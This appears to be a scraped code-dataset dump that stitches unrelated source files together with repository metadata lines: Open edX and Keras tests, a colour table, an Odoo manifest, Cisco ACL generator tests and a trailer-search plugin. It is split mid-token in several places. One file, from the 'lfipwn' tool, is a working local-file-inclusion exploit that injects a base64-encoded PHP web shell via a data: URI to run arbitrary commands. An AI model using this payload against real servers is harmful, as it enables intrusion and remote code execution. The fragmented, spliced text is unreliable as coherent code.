class CoursewareContextTestCase(ModuleStoreTestCase):
"""
Base testcase class for courseware context for the
comment client service integration
"""
def setUp(self):
super().setUp()
self.course = CourseFactory.create(org="TestX", number="101", display_name="Test Course")
self.discussion1 = ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion1",
discussion_category="Chapter",
discussion_target="Discussion 1"
)
self.discussion2 = ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion2",
discussion_category="Chapter / Section / Subsection",
discussion_target="Discussion 2"
)
def test_empty(self):
utils.add_courseware_context([], self.course, self.user)
def test_missing_commentable_id(self):
orig = {"commentable_id": "non-inline"}
modified = dict(orig)
utils.add_courseware_context([modified], self.course, self.user)
assert modified == orig
def test_basic(self):
threads = [
{"commentable_id": self.discussion1.discussion_id},
{"commentable_id": self.discussion2.discussion_id}
]
utils.add_courseware_context(threads, self.course, self.user)
def assertThreadCorrect(thread, discussion, expected_title): # pylint: disable=invalid-name
"""Asserts that the given thread has the expected set of properties"""
assert set(thread.keys()) == set(['commentable_id', 'courseware_url', 'courseware_title'])
assert thread.get('courseware_url') == reverse('jump_to', kwargs={'course_id': str(self.course.id), 'location': str(discussion.location)})
assert thread.get('courseware_title') == expected_title
assertThreadCorrect(threads[0], self.discussion1, "Chapter / Discussion 1")
assertThreadCorrect(threads[1], self.discussion2, "Subsection / Discussion 2")
def test_empty_discussion_subcategory_title(self):
"""
Test that for empty subcategory inline discussion modules,
the divider " / " is not rendered on a post or inline discussion topic label.
"""
discussion = ItemFactory.create(
|
eteq/ginga
|
ginga/colors.py
|
Python
|
bsd-3-clause
| 48,361
| 0.000186
|
#
# colors.py -- color definitions
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import re
color_dict = {
'aliceblue': (0.9411764705882353, 0.9725490196078431, 1.0),
'antiquewhite': (0.9803921568627451, 0.9215686274509803, 0.8431372549019608),
'antiquewhite1': (1.0, 0.9372549019607843, 0.8588235294117647),
'antiquewhite2': (0.9333333333333333, 0.8745098039215686, 0.8),
'antiquewhite3': (0.803921568627451, 0.7529411764705882, 0.6901960784313725),
'antiquewhite4': (0.5450980392156862,
0.5137254901960784,
0.47058823529411764),
'aquamarine': (0.4980392156862745, 1.0, 0.8313725490196079),
'aquamarine1': (0.4980392156862745, 1.0, 0.8313725490196079),
'aquamarine2': (0.4627450980392157, 0.9333333333333333, 0.7764705882352941),
'aquamarine3': (0.4, 0.803921568627451, 0.6666666666666666),
'aquamarine4': (0.27058823529411763, 0.5450980392156862, 0.4549019607843137),
'azure': (0.9411764705882353, 1.0, 1.0),
'azure1': (0.9411764705882353, 1.0, 1.0),
'azure2': (0.8784313725490196, 0.9333333333333333, 0.9333333333333333),
'azure3': (0.7568627450980392, 0.803921568627451, 0.803921568627451),
'azure4': (0.5137254901960784, 0.5450980392156862, 0.5450980392156862),
'beige': (0.9607843137254902, 0.9607843137254902, 0.8627450980392157),
'bisque': (1.0, 0.8941176470588236, 0.7686274509803922),
'bisque1': (1.0, 0.8941176470588236, 0.7686274509803922),
'bisque2': (0.9333333333333333, 0.8352941176470589, 0.7176470588235294),
'bisque3': (0.803921568627451, 0.7176470588235294, 0.6196078431372549),
'bisque4': (0.5450980392156862, 0.49019607843137253, 0.4196078431372549),
'black': (0.0, 0.0, 0.0),
'blanchedalmond': (1.0, 0.9215686274509803, 0.803921568627451),
'blue': (0.0, 0.0, 1.0),
'blue1': (0.0, 0.0, 1.0),
'blue2': (0.0, 0.0, 0.9333333333333333),
'blue3': (0.0, 0.0, 0.803921568627451),
'blue4': (0.0, 0.0, 0.5450980392156862),
'blueviolet': (0.5411764705882353, 0.16862745098039217, 0.8862745098039215),
'brown': (0.6470588235294118, 0.16470588235294117, 0.16470588235294117),
'brown1': (1.0, 0.25098039215686274, 0.25098039215686274),
'brown2': (0.9333333333333333, 0.23137254901960785, 0.23137254901960785),
'brown3': (0.803921568627451, 0.2, 0.2),
'brown4': (0.5450980392156862, 0.13725490196078433, 0.13725490196078433),
'burlywood': (0.8705882352941177, 0.7215686274509804, 0.5294117647058824),
'burlywood1': (1.0, 0.8274509803921568, 0.6078431372549019),
'burlywood2': (0.9333333333333333, 0.7725490196078432, 0.5686274509803921),
'burlywood3': (0.803921568627451, 0.6666666666666666, 0.49019607843137253),
'burlywood4': (0.5450980392156862, 0.45098039215686275, 0.3333333333333333),
'cadetblue': (0.37254901960784315, 0.6196078431372549, 0.6274509803921569),
'cadetblue1': (0.596078431372549, 0.9607843137254902, 1.0),
'cadetblue2': (0.5568627450980392, 0.8980392156862745, 0.9333333333333333),
'cadetblue3': (0.47843137254901963, 0.7725490196078432, 0.803921568627451),
'cadetblue4': (0.3254901960784314, 0.5254901960784314, 0.5450980392156862),
'chartreuse': (0.4980392156862745, 1.0, 0.0),
'chartreuse1': (0.4980392156862745, 1.0, 0.0),
'chartreuse2': (0.4627450980392157, 0.9333333333333333, 0.0),
'chartreuse3': (0.4, 0.803921568627451, 0.0),
'chartreuse4': (0.27058823529411763, 0.5450980392156862, 0.0),
'chocolate': (0.8235294117647058, 0.4117647058823529, 0.11764705882352941),
'chocolate1': (1.0, 0.4980392156862745, 0.1411764705882353),
'chocolate2': (0.9333333333333333, 0.4627450980392157, 0.12941176470588237),
'chocolate3': (0.803921568627451, 0.4, 0.11372549019607843),
'chocolate4': (0.5450980392156862, 0.27058823529411763, 0.07450980392156863),
'coral': (1.0, 0.4980392156862745, 0.3137254901960784),
'coral1': (1.0, 0.4470588235294118, 0.33725490196078434),
'coral2': (0.9333333333333333, 0.41568627450980394, 0.3137254901960784),
'coral3': (0.803921568627451, 0.3568627450980392, 0.27058823529411763),
'coral4': (0.5450980392156862, 0.24313725490196078, 0.1843137254901961),
'cornflowerblue': (0.39215686274509803,
0.5843137254901961,
0.9294117647058824),
'cornsilk': (1.0, 0.9725490196078431, 0.8627450980392157),
'cornsilk1': (1.0, 0.9725490196078431, 0.8627450980392157),
'cornsilk2': (0.9333333333333333, 0.9098039215686274, 0.803921568627451),
'cornsilk3': (0.803921568627451, 0.7843137254901961, 0.6941176470588235),
'cornsilk4': (0.5450980392156862, 0.5333333333333333, 0.47058823529411764),
'cyan': (0.0, 1.0, 1.0),
'cyan1': (0.0, 1.0, 1.0),
'cyan2': (0.0, 0.9333333333333333, 0.9333333333333333),
'cyan3': (0.0, 0.803921568
|
627451, 0.803921568627451),
'cyan4': (0.0, 0.5450980392156862, 0.5450980392156862),
'darkblue': (0.0, 0.0, 0.5450980392156862),
'darkcyan': (0.0, 0.5450980392156862, 0.5450980392156862),
'darkgoldenrod': (0.7215686274509804,
0.5254901960784314,
|
0.043137254901960784),
'darkgoldenrod1': (1.0, 0.7254901960784313, 0.058823529411764705),
'darkgoldenrod2': (0.9333333333333333,
0.6784313725490196,
0.054901960784313725),
'darkgoldenrod3': (0.803921568627451,
0.5843137254901961,
0.047058823529411764),
'darkgoldenrod4': (0.5450980392156862,
0.396078431372549,
0.03137254901960784),
'darkgray': (0.6627450980392157, 0.6627450980392157, 0.6627450980392157),
'darkgreen': (0.0, 0.39215686274509803, 0.0),
'darkgrey': (0.6627450980392157, 0.6627450980392157, 0.6627450980392157),
'darkkhaki': (0.7411764705882353, 0.7176470588235294, 0.4196078431372549),
'darkmagenta': (0.5450980392156862, 0.0, 0.5450980392156862),
'darkolivegreen': (0.3333333333333333,
0.4196078431372549,
0.1843137254901961),
'darkolivegreen1': (0.792156862745098, 1.0, 0.4392156862745098),
'darkolivegreen2': (0.7372549019607844,
0.9333333333333333,
0.40784313725490196),
'darkolivegreen3': (0.6352941176470588,
0.803921568627451,
0.35294117647058826),
'darkolivegreen4': (0.43137254901960786,
0.5450980392156862,
0.23921568627450981),
'darkorange': (1.0, 0.5490196078431373, 0.0),
'darkorange1': (1.0, 0.4980392156862745, 0.0),
'darkorange2': (0.9333333333333333, 0.4627450980392157, 0.0),
'darkorange3': (0.803921568627451, 0.4, 0.0),
'darkorange4': (0.5450980392156862, 0.27058823529411763, 0.0),
'darkorchid': (0.6, 0.19607843137254902, 0.8),
'darkorchid1': (0.7490196078431373, 0.24313725490196078, 1.0),
'darkorchid2': (0.6980392156862745, 0.22745098039215686, 0.9333333333333333),
'darkorchid3': (0.6039215686274509, 0.19607843137254902, 0.803921568627451),
'darkorchid4': (0.40784313725490196, 0.13333333333333333, 0.5450980392156862),
'darkred': (0.5450980392156862, 0.0, 0.0),
'darksalmon': (0.9137254901960784, 0.5882352941176471, 0.47843137254901963),
'darkseagreen': (0.5607843137254902, 0.7372549019607844, 0.5607843137254902),
'darkseagreen1': (0.7568627450980392, 1.0, 0.7568627450980392),
'darkseagreen2': (0.7058823529411765, 0.9333333333333333, 0.7058823529411765),
'darkseagreen3': (0.6078431372549019, 0.803921568627451, 0.6078431372549019),
'darkseagreen4': (0.4117647058823529, 0.5450980392156862, 0.4117647058823529),
'darkslateblue': (0.2823529411764706,
0.23921568627450981,
0.5450980392156862),
'darkslategray': (0.1843137254901961,
0.30980392156862746,
0.30980392156862746),
'darkslategray1': (0.592156862745098, 1.0, 1.0),
'darkslategray2': (0.5529411764705883,
0.9333333333333333,
0.9333333333333333),
'darkslategray3': (0.4745098039215686, 0.803921568627451, 0.803921568627451),
'darkslategray4': (0.3215686274509804,
0.5450980392156862,
0.5450980392156862),
'darkslategrey': (0.1843137254901
|
MostlyOpen/odoo_addons
|
myo_base/__openerp__.py
|
Python
|
agpl-3.0
| 1,788
| 0
|
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
{
'name': 'Base Module',
'summary': 'Base Module used by MostlyOpen Solutions.',
'version': '2.0.0',
'author': 'Carlos Eduardo Vercelino - CLVsol',
'cate
|
gory': 'Generic Modules/Others',
'license': 'AGPL-3',
'website': 'http://mostlyopen.org',
'depends': ['base'],
'data': [
'security/base_security.xml',
'views/base_menu_view.xml',
'views/groupings_menu_view.xml',
'views/agro_menu_view.xml',
'vi
|
ews/community_menu_view.xml',
'views/health_menu_view.xml',
'views/insurance_menu_view.xml',
'views/pharmacy_menu_view.xml',
'views/mfmng_menu_view.xml',
'views/res_users_view.xml',
],
'demo': [],
'test': [],
'init_xml': [],
'test': [],
'update_xml': [],
'installable': True,
'application': False,
'active': False,
'css': [],
}
|
m101/lfipwn
|
core/techniques/LFIDataURI.py
|
Python
|
agpl-3.0
| 1,128
| 0.018617
|
from core.techniques.LFIExec import LFIExec
from base64 import b64encode
class LFIDataURI (LFIExec):
files_exec = [
# input
{ 'path' : '', 'type' : 'data_uri' },
]
# find LFI code execution path
def check (self):
return super(LFIDataURI, self)._check (prepare_check_data_uri)
# do exec
def exploit (self, cmd):
return super(LFIDataURI, self)._exploit (prepare_exec_data_uri, cmd)
def prepare_check_data_uri (lfi, payload):
purl = lfi.pattern_url[:]
payload = 'data:text/plain;base64,' + b64encode (payload)
# payload = 'data:text/plain,' + payload
url = purl.replace (lfi.payload_placeholder, payload)
return url
def prepare_exec_data_ur
|
i (lfi, cmd):
purl = lfi.pattern_url[:]
payload_exec = '<?php echo "' + lfi.tag_start_exec + '"; system ($_GET["cmd"]); echo "' + lfi.t
|
ag_end_exec + '"; ?>'
payload = 'data:text/plain;base64,{0}&cmd={1}'.format (b64encode (payload_exec), cmd)
# payload = 'data:text/plain,{0}&cmd={1}'.format (payload_exec, cmd)
url = purl.replace (lfi.payload_placeholder, payload)
return url
|
frreiss/tensorflow-fred
|
tensorflow/python/keras/engine/deferred_sequential_test.py
|
Python
|
apache-2.0
| 8,563
| 0.003503
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests specific to deferred-build `Sequential` models."""
import os
import unittest
import numpy as np
from tensorflow.python import keras
from tensorflow.python.compat import v2_compat
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class TestDeferredSequential(keras_parameterized.TestCase):
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_build_behavior(self):
# Test graph network creation after __call__
model = get_model()
model(np.random.random((2, 6)))
self.assertLen(model.weights, 4)
self.assertTrue(model._is_graph_network)
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [2, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [2, 2])
# Test effect of new __call__ with a different shape
model(np.random.random((3, 6)))
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [None, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [None, 2])
model(np.random.random((4, 6)))
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [None, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [None, 2])
# Test graph network creation after build
model = get_model()
model.build((None, 6))
self.assertLen(model.weights, 4)
self.assertTrue(model._is_graph_network)
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [None, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [None, 2])
# Test graph network creation after compile/fit
model = get_model()
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy()],
run_eagerly=testing_utils.should_run_eagerly())
model.fit(np.zeros((2, 6)), np.zeros((2, 2)))
self.assertLen(model.weights, 4)
self.assertTrue(model._is_graph_network)
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
# Inconsistency here: with eager `fit`, the model is built with shape
# (2, 6), but with graph function `fit`, it is built with shape `(None, 6)`.
# This is likely due to our assumption "the batch size should be dynamic"
# at the level of `Model`. TODO(fchollet): investigate and resolve.
self.assertEqual(model.inputs[0].shape.as_list()[-1], 6)
self.assertEqual(model.outputs[0].shape.as_list()[-1], 2)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_add_and_pop(self):
model = get_model()
model.build((None, 6))
self.assertTrue(model.built)
self.assertTrue(model._is_graph_network)
self.assertLen(model.layers, 3)
self.assertLen(model.weights, 4)
model.pop()
self.assertTrue(model.bu
|
ilt)
self.assertTrue(model._is_graph_network)
self.assertLen(model.layer
|
s, 2)
self.assertLen(model.weights, 2)
model.add(keras.layers.Dense(2))
self.assertTrue(model.built)
self.assertTrue(model._is_graph_network)
self.assertLen(model.layers, 3)
self.assertLen(model.weights, 4)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_feature_extraction(self):
# This tests layer connectivity reset when rebuilding
model = get_model()
model(np.random.random((3, 6))) # First build
model(np.random.random((4, 6))) # Triggers a rebuild
# Classic feature extractor pattern
extractor = keras.Model(inputs=model.inputs,
outputs=[layer.output for layer in model.layers])
# Check that inputs and outputs are connected
_ = extractor(np.random.random((4, 6)))
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_saving_savedmodel(self):
model = get_model()
model(np.random.random((3, 6))) # Build model
path = os.path.join(self.get_temp_dir(), 'model_path')
model.save(path)
new_model = keras.models.load_model(path)
model_layers = model._flatten_layers(include_self=True, recursive=False)
new_model_layers = new_model._flatten_layers(
include_self=True, recursive=False)
for layer1, layer2 in zip(model_layers, new_model_layers):
self.assertEqual(layer1.name, layer2.name)
for w1, w2 in zip(layer1.weights, layer2.weights):
self.assertAllClose(w1, w2)
@unittest.skipIf(h5py is None, 'Test requires h5py')
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_saving_h5(self):
path = os.path.join(self.get_temp_dir(), 'model_path.h5')
model = get_model()
model(np.random.random((3, 6))) # Build model
path = os.path.join(self.get_temp_dir(), 'model_path.h5')
model.save(path)
new_model = keras.models.load_model(path)
model_layers = model._flatten_layers(include_self=True, recursive=False)
new_model_layers = new_model._flatten_layers(
include_self=True, recursive=False)
for layer1, layer2 in zip(model_layers, new_model_layers):
self.assertEqual(layer1.name, layer2.name)
for w1, w2 in zip(layer1.weights, layer2.weights):
self.assertAllClose(w1, w2)
@keras_parameterized.run_all_keras_modes
def test_shared_layer(self):
# This tests that preexisting layer connectivity is preserved
# when auto-building graph networks
shared_layer = keras.layers.Dense(2)
m1 = keras.Sequential([shared_layer])
m1(np.random.random((3, 6)))
m2 = keras.Sequential([shared_layer])
m2(np.random.random((3, 6)))
# Nesting case
shared_layer = keras.layers.Dense(2)
m1 = keras.Sequential([shared_layer])
m2 = keras.Sequential([shared_layer, m1])
m2(np.random.random((3, 2)))
@keras_parameterized.run_all_keras_modes
def test_loss_layer(self):
class LossLayer(keras.layers.Layer):
def call(self, inputs):
self.add_loss(math_ops.reduce_sum(inputs))
return inputs
# Test loss layer alone
model = keras.Sequential([LossLayer()])
model.compile('rmsprop', run_eagerly=testing_utils.should_run_eagerly())
loss = model.train_on_batch(np.ones((2, 2)))
self.assertAllClose(loss, 4.)
model(np.random.random((4, 2))) # Triggers a rebuild
loss = model.train_on_batch(np.ones((1, 2)))
self.assertAllClose(loss, 2.)
# Test loss layer combined with another layer
model = keras.Sequential([
keras.layers.Dense(1, kernel_initializer='ones'),
LossLayer()])
model.compile('rmsprop', run_eagerly=testing_utils.should_run_eagerly())
loss = model.train_on_batch(np.ones((2, 2)))
self.assertAllClose(loss, 4.)
model(np.random.random((4, 2))) # Triggers a rebuild
loss = model.train_on_batch(np.ones((1, 2)))
self.assertLess(loss, 2.)
# Test loss layer combined with external loss
model = keras.Sequential([
keras.layers.Dense(1, kernel_initializer='ones'),
LossLayer()])
model.compile('rmsprop', 'mse',
run_eagerly=testing_utils.should_run_eagerly())
loss = model.train_on_batch(np.ones((2, 2)), np.ones((2, 2)))
model(np.random.random((4, 2))) # Trigger
|
ryantierney513/capirca
|
tests/lib/cisco_test.py
|
Python
|
apache-2.0
| 23,978
| 0.001877
|
# Copyright 2008 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licens
|
es/LICENSE-2.0
#
# unless required by applicable law or agreed to i
|
n writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unittest for cisco acl rendering module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import re
import unittest
from lib import aclgenerator
from lib import cisco
from lib import nacaddr
from lib import naming
from lib import policy
import mock
GOOD_HEADER = """
header {
comment:: "this is a test acl"
target:: cisco test-filter
}
"""
GOOD_STANDARD_HEADER_1 = """
header {
comment:: "this is a standard acl"
target:: cisco 99 standard
}
"""
GOOD_STANDARD_HEADER_2 = """
header {
comment:: "this is a standard acl"
target:: cisco FOO standard
}
"""
GOOD_STANDARD_NUMBERED_HEADER = """
header {
comment:: "numbered standard"
target:: cisco 50 standard
}
"""
GOOD_OBJGRP_HEADER = """
header {
comment:: "obj group header test"
target:: cisco objgroupheader object-group
}
"""
GOOD_INET6_HEADER = """
header {
comment:: "inet6 header test"
target:: cisco inet6_acl inet6
}
"""
GOOD_MIXED_HEADER = """
header {
comment:: "mixed inet/inet6 header test"
target:: cisco mixed_acl mixed
}
"""
GOOD_DSMO_HEADER = """
header {
comment:: "this is a dsmo test acl"
target:: cisco dsmo_acl extended enable_dsmo
}
"""
GOOD_EXTENDED_NUMBERED_HEADER = """
header {
comment:: "numbered extended"
target:: cisco 150 extended
}
"""
BAD_STANDARD_HEADER_1 = """
header {
comment:: "this is a standard acl"
target:: cisco 2001 standard
}
"""
BAD_STANDARD_HEADER_2 = """
header {
comment:: "this is a standard acl"
target:: cisco 101 standard
}
"""
BAD_HEADER = """
header {
comment:: "this is a test acl"
target:: juniper test-filter
}
"""
BAD_HEADER_2 = """
header {
target:: cisco 1300
}
"""
GOOD_STANDARD_TERM_1 = """
term standard-term-1 {
address:: SOME_HOST
action:: accept
}
"""
GOOD_STANDARD_TERM_2 = """
term standard-term-2 {
address:: SOME_HOST
action:: accept
}
"""
BAD_STANDARD_TERM_1 = """
term bad-standard-term-1 {
destination-address:: SOME_HOST
protocol:: tcp
action:: accept
}
"""
UNSUPPORTED_TERM_1 = """
term protocol_except_term {
protocol-except:: tcp udp icmp
action:: reject
}
"""
UNSUPPORTED_TERM_2 = """
term protocol_except_term {
source-prefix:: configured-neighbors-only
action:: reject
}
"""
EXPIRED_TERM = """
term is_expired {
expiration:: 2001-01-01
action:: accept
}
"""
EXPIRING_TERM = """
term is_expiring {
expiration:: %s
action:: accept
}
"""
GOOD_TERM_1 = """
term good-term-1 {
protocol:: icmp
action:: accept
}
"""
GOOD_TERM_2 = """
term good-term-2 {
protocol:: tcp
destination-address:: SOME_HOST
source-port:: HTTP
option:: established
action:: accept
}
"""
GOOD_TERM_3 = """
term good-term-3 {
protocol:: tcp
option:: tcp-established
action:: accept
}
"""
GOOD_TERM_4 = """
term good-term-4 {
protocol:: tcp
logging:: true
action:: accept
}
"""
GOOD_TERM_5 = """
term good-term-5 {
verbatim:: cisco "mary had a little lamb"
verbatim:: iptables "mary had second lamb"
verbatim:: juniper "mary had third lamb"
}
"""
GOOD_TERM_6 = """
term good-term-6 {
destination-address:: ANY
action:: accept
}
"""
GOOD_TERM_7 = """
term good-term {
protocol:: vrrp
action:: accept
}
"""
GOOD_TERM_8 = """
term good-term {
protocol:: tcp
destination-address:: SOME_HOST
action:: accept
}
"""
GOOD_TERM_9 = """
term good-term-9 {
protocol:: tcp udp
option:: established
action:: accept
}
"""
GOOD_TERM_10 = """
term good-term-10 {
protocol:: icmp
icmp-type:: echo-reply unreachable time-exceeded
action:: accept
}
"""
GOOD_TERM_11 = """
term good-term-11 {
protocol:: icmpv6
icmp-type:: echo-reply destination-unreachable time-exceeded
action:: accept
}
"""
GOOD_TERM_12 = """
term good-term-12 {
action:: accept
}
"""
GOOD_TERM_13 = """
term good-term-13 {
owner:: foo@google.com
action:: accept
}
"""
GOOD_TERM_14 = """
term good-term-14 {
protocol:: tcp
destination-address:: SOME_HOST
destination-port:: CONSECUTIVE_PORTS
action:: accept
}
"""
GOOD_TERM_15 = """
term good-term-15 {
protocol:: hopopt
action:: accept
}
"""
GOOD_TERM_16 = """
term good-term-16 {
protocol:: tcp
action:: accept
dscp-match:: 42
}
"""
GOOD_TERM_17 = """
term good-term-17 {
protocol:: tcp udp
policer:: batman
option:: established
action:: accept
}
"""
GOOD_TERM_18 = """
term good-term-18 {
source-address:: SOME_HOST
destination-address:: SOME_HOST
action:: accept
}
"""
LONG_COMMENT_TERM = """
term long-comment-term {
comment:: "%s "
action:: accept
}
"""
SUPPORTED_TOKENS = {
'action',
'address',
'comment',
'destination_address',
'destination_address_exclude',
'destination_port',
'dscp_match',
'expiration',
'icmp_type',
'logging',
'name',
'option',
'owner',
'platform',
'platform_exclude',
'protocol',
'source_address',
'source_address_exclude',
'source_port',
'translated',
'verbatim',
}
SUPPORTED_SUB_TOKENS = {
'action': {'accept', 'deny', 'reject', 'next',
'reject-with-tcp-rst'},
'icmp_type': {
'alternate-address',
'certification-path-advertisement',
'certification-path-solicitation',
'conversion-error',
'destination-unreachable',
'echo-reply',
'echo-request',
'mobile-redirect',
'home-agent-address-discovery-reply',
'home-agent-address-discovery-request',
'icmp-node-information-query',
'icmp-node-information-response',
'information-request',
'inverse-neighbor-discovery-advertisement',
'inverse-neighbor-discovery-solicitation',
'mask-reply',
'mask-request',
'information-reply',
'mobile-prefix-advertisement',
'mobile-prefix-solicitation',
'multicast-listener-done',
'multicast-listener-query',
'multicast-listener-report',
'multicast-router-advertisement',
'multicast-router-solicitation',
'multicast-router-termination',
'neighbor-advertisement',
'neighbor-solicit',
'packet-too-big',
'parameter-problem',
'redirect',
'redirect-message',
'router-advertisement',
'router-renumbering',
'router-solicit',
'router-solicitation',
'source-quench',
'time-exceeded',
'timestamp-reply',
'timestamp-request',
'unreachable',
'version-2-multicast-listener-report',
},
'option': {'established',
'tcp-established'}
}
# Print a info message when a term is set to expire in that many weeks.
# This is normally passed from command line.
EXP_INFO = 2
class CiscoTest(unittest.TestCase):
def setUp(self):
self.naming = mock.create_autospec(naming.Naming)
def testIPVersion(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('0.0.0.0/0'),
nacaddr.IP('::/0')]
pol = policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_6, self.naming)
acl = cisco.Cisco(pol, EXP_INFO)
# check if we've got a v6 address in there.
self.failIf('::' in str(acl), str(acl))
self.naming.GetNetAddr.assert_called_once_with('ANY')
def testOptions(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
self.naming.GetServiceByProto.return_value = ['80']
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_2,
self.naming), EXP_INFO)
# this is a hacky sort of way
|
neno1978/pelisalacarta
|
python/main-classic/channels/trailertools.py
|
Python
|
gpl-3.0
| 26,400
| 0.005538
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------
# pelisalacarta 4
# Copyright 2015 tvalacarta@gmail.com
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
#
# Distributed under the terms of GNU General Public License v3 (GPLv3)
# http://www.gnu.org/licenses/gpl-3.0.html
# ------------------------------------------------------------
# This file is part of pelisalacarta 4.
#
# pelisalacarta 4 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pelisalacarta 4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pelisalacarta 4. If not, see <http://www.gnu.org/licenses/>.
# --------------------------------------------------------------------------------
# Search trailers from youtube, filmaffinity, abandomoviez, vimeo, etc...
# --------------------------------------------------------------------------------
import re
import urllib
import urlparse
from core import config
from core import jsontools
from core import logger
from core import scrapertools
from core import servertools
from core.item import Item
from platformcode import platformtools
result = None
window_select = []
# Para habilitar o no la opción de búsqueda manual
if config.get_platform() != "plex":
keyboard = True
else:
keyboard = False
def buscartrailer(item, trailers=[]):
logger.info()
# Lista de acciones si se ejecuta desde el menú contextual
if item.action == "manual_search" and item.contextual:
itemlist = manual_search(item)
item.contentTitle = itemlist[0].contentTitle
elif 'search' in item.action and item.contextual:
itemlist = globals()[item.action](item)
else:
# Se elimina la opción de Buscar Trailer del menú contextual para evitar redundancias
if type(item.context) is str and "buscar_trailer" in item.context:
item.context = item.context.replace("buscar_trailer", "")
elif type(item.context) is list and "buscar_trailer" in item.context:
item.context.remove("buscar_trailer")
item.text_color = ""
itemlist = []
if item.contentTitle != "":
item.contentTitle = item.contentTitle.strip()
elif keyboard:
fulltitle = re.sub('\[\/*(B|I|COLOR)\s*[^\]]*\]', '', item.fulltitle.strip())
item.contentTitle = platformtools.dialog_input(default=fulltitle, heading="Introduce el título a buscar")
if item.contentTitle is None:
item.contentTitle = fulltitle
else:
item.contentTitle = item.contentTitle.strip()
else:
fulltitle = re.sub('\[\/*(B|I|COLOR)\s*[^\]]*\]', '', item.fulltitle.strip())
item.contentTitle = fulltitle
item.year = item.infoLabels['year']
logger.info("Búsqueda: %s" % item.contentTitle)
logger.info("Año: %s" % item.year)
if item.infoLabels['trailer'] and not trailers:
url = item.infoLabels['trailer']
if "youtube" in url:
url = url.replace("embed/", "watch?v=")
titulo, url, server = servertools.findvideos(url)[0]
title = "Trailer por defecto [" + server + "]"
itemlist.append(item.clone(title=title, url=url, server=server, action="play"))
if item.show or item.infoLabels['tvshowtitle'] or item.contentType != "movie":
tipo = "tv"
else:
tipo = "movie"
try:
if not trailers:
itemlist.extend(tmdb_trailers(item, tipo))
else:
for trailer in trailers:
title = trailer['name'] + " [" + trailer['size'] + "p] (" + trailer['language'].replace("en", "ING")\
.replace("es", "ESP")+") [tmdb/youtube]"
itemlist.append(item.clone(action="play", title=title, url=trailer['url'], server="youtube"))
except:
import traceback
logger.error(traceback.format_exc())
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda en Youtube", action="youtube_search",
text_color="green"))
itemlist.append(item.clone(title=title % "Búsqueda en Filmaffinity",
action="filmaffinity_search", text_color="green"))
# Si se trata de una serie, no se incluye la opción de buscar en Abandomoviez
if not item.show and not item.infoLabels['tvshowtitle']:
itemlist.append(item.clone(title=title % "Búsqueda en Abandomoviez",
action="abandomoviez_search", text_color="green"))
